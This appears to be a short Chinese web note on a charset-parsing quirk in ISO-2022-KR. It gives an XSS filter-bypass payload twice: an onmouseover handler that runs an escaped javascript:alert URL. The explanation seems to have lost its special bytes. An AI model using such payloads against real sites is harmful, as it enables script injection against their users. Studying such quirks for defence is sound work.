[总结] 字符集编码
[ISO-2022-KR].在这个字符集当中存在一种缺陷。就是会把以开头结尾的一串字符看作是2 bytes也就是一个字符。
利用:
<h1 a=> onmouseover=location='jav\x41script\x3Aalert\x28"Mxx"\x29' >xxx
[ISO-2022-KR].在这个字符集当中存在一种缺陷。就是会把以开头结尾的一串字符看作是2 bytes也就是一个字符。
利用:
<h1 a=> onmouseover=location='jav\x41script\x3Aalert\x28"Mxx"\x29' >xxx
浙公网安备 33010602011771号